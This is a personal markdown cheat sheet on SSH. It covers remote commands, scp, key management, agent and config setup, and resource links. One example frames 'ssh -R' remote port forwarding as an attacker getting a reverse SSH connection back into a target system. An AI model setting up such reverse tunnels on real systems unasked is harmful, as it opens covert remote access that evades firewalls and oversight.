# SSH
Secure Shell

---

## Table of Contents
```{contents}
```

---

## Commands Reference

---

### Remote Ops

---

**`ssh`** "secure shell"

options
* `-R` enables remote port forwarding

[example]

Run command `ps` on the remote machine `myserver`.

```bash
ssh myserver ps
ssh username@myserver ps       # specify user name
ssh -l username myserver ps    # specify user name
ssh -p 22 myserver ps          # specify port number
ssh myserver ps > /tmp/ps.out  # redirect the output to a file on your local system
ssh myserver ps \> /tmp/ps.out # redirect the output to a file on the remote system
```

[example]

Run a script remotely.

```bash
ssh myserver bash < ./myscript.sh
```

[example]

test version with leading `echo`

```bash
for node in web-server{00..09}; do
  echo ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'
done
```

ready version

```bash
for node in web-server{00..09}; do
  ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'
done
```

[example]

wait for a reboot

```bash
until ssh user@10.10.10.10; do sleep 3; done
```

[example]

reverse SSH connection
* `12345` is the port number that the remote system (the attacker) will use to SSH back into the target
* `localhost:22` specifies the port number that the target system will listen on to receive a connection

```bash
ssh -R 12345:localhost:22 user@remoteipaddress
```
```bash
ssh localhost -p 12345 # setup a reverse connection from the attacker system after the target has connected
```

---

**`scp`** "secure copy"

[example]

Upload the file `some_system.tar.gz` to the home directory of user `bob` on remote system `10.0.0.45`.

```bash
scp some_system.tar.gz bob@10.0.0.45:/home/bob/some_system.tar.gz
```

https://www.linuxfoundation.org/blog/blog/classic-sysadmin-how-to-securely-transfer-files-between-servers-with-scp

---

**`sftp`** "secure file transfer protocol"

---

### Key Management

---

* `ssh-add`
  * `ssh-add --apple-use-keychain ~/.ssh/id_ed25519`
  * `ssh-add -l` list private keys currently accessible to ssh-agent
* `ssh-keysign`
* `ssh-keyscan`
* `ssh-keygen`
  * `ssh-keygen -f ~/.ssh/id_ed25519 -t ed25519 -C "email@example.com"`

---

### Service

---

* `sshd`
* `sftp-server`
* `ssh-agent`
  * `eval "$(ssh-agent -s)"`
  * `echo $SSH_AGENT_PID`
  * `echo $SSH_AUTH_SOCK`

---

`ssh-copy-id`
* `ssh-copy-id -i ~/.ssh/id_ed25519 user@host`

OpenSSH Files

`~/.ssh/authorized_keys`

`~/.ssh/known_hosts`

`~/.ssh/config`

```
Host github.com
  AddKeysToAgent yes
  Hostname       github.com
  IdentityAgent  
  IdentityFile   ~/.ssh/id_ed25519
  UseKeychain    yes
  User           git
```

---

## Resources

[ [h](https://www.openssh.com/) ][ [w](https://en.wikipedia.org/wiki/OpenSSH) ] OpenSSH

Tools
* clusterssh - Written in Perl, it opens a bunch of unmanaged terminals in windows.
* mssh (MultiSSH) - GTK+–based multi-SSH client in a single GUI window.
* mussh - MUltihost SSH Wrapper shell script.
* pconsole - Intended for tiling window managers, spawns a terminal per host.
* multixterm - Written in Expect & Tk, drives multiple xterms.
* PAC Manager - A Perl SecureCRT-like GUI on Linux.

More
* https://www.ssh.com/
  * https://www.ssh.com/academy/ssh/port
* https://help.ubuntu.com/community/SSH/OpenSSH/Keys

### YouTube

Akamai Developer
* [ [y](https://www.youtube.com/watch?v=pE3EuiyShoM) ] `02-23-2022`. "How to use Multiple SSH Keys | Managing Different SSH Keys on your System".
* [ [y](https://www.youtube.com/watch?v=33dEcCKGBO4) ] `10-27-2021`. "SSH Key Authentication | How to Create SSH Key Pairs".

LearnLinuxTV
* [ [y](https://www.youtube.com/watch?v=kjFz7Lp8Qjk) ] `02-07-2023`. "Linux Crash Course - Connecting to Linux Servers via SSH".
* [ [y](https://www.youtube.com/watch?v=sBrAVQumqjs) ] `11-14-2022`. "5 Must Have Tweaks to Secure OpenSSH".
* [ [y](https://www.youtube.com/watch?v=v2ii8kdXCic) ] `03-23-2022`. "Speed Up Your SSH Sessions with These Seven Quick SSH Config Tricks".
* [ [y](https://www.youtube.com/watch?v=GxRu35fy-oY) ] `01-10-2022`. "Getting Started with OpenSSH Key Management".
* [ [y](https://www.youtube.com/watch?v=MWqfc_fegVg) ] `11-18-2021`. "The OpenSSH Client Config File: Simplify your SSH Connections".
* [ [y](https://www.youtube.com/watch?v=YS5Zh7KExvE) ] `12-18-2020`. "SSH Full Course - EVERYTHING You Need to Know!".
        https://www.youtube.com/watch?v=YS5Zh7KExvE
* [ [y](https://www.youtube.com/watch?v=7OQYlLh0srY) ] `10-21-2019`. "Linux Commands for Beginners 22 - Remote Management with OpenSSH".

More
* [ [y](https://www.youtube.com/watch?v=ORcvSkgdA58) ] `01-31-2019`. Computerphile. "How Secure Shell Works (SSH) - Computerphile".
* [ [y](https://www.youtube.com/watch?v=VsCTp9yH6iQ) ] `03-03-2024`. Lawrence Systems. "Linux Supply Chain Attack Discovered in SSH CVE-2024-3094".
* [ [y](https://www.youtube.com/watch?v=vV_WdTBbww4) ] `04-03-2024`. Low Level Learning. "revealing the features of the XZ backdoor".
* [ [y](https://www.youtube.com/watch?v=tZop-zjYkrU) ] `03-11-2020`. PowerCert Animated Videos. "Telnet vs SSH Explained".
* [ [y](https://www.youtube.com/watch?v=hQWRp-FdTpc) ] `07-08-2018`. Traversy Media. "SSH Crash Course | With Some DevOps".

---

## Texts

* [ [h](http://www.snailbook.com/index.html) ] Barrett, Daniel J.; Richard E. Silverman; & Robert G. Byrnes. (2005). _SSH The Secure Shell: The Definitive Guide_. 2nd Ed. O'Reilly.

---

## Terms

* [ w ] Host Key (authenticates computer)
* [ w ] Identity Key (authenticates user)
* [ [w](https://en.wikipedia.org/wiki/OpenSSH) ] OpenSSH
* [ [w](https://en.wikipedia.org/wiki/PuTTY) ] PuTTY
* [ [w](https://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol) ] SFTP Secure File Transfer Protocol
* [ [w](https://en.wikipedia.org/wiki/Secure_Shell) ] SSH Secure Shell
* [ [w](https://en.wikipedia.org/wiki/Comparison_of_SSH_clients) ] SSH Client
* [ [w](https://en.wikipedia.org/wiki/Comparison_of_SSH_servers) ] SSH Server
* [ [w](https://en.wikipedia.org/wiki/Telnet) ] Telnet

---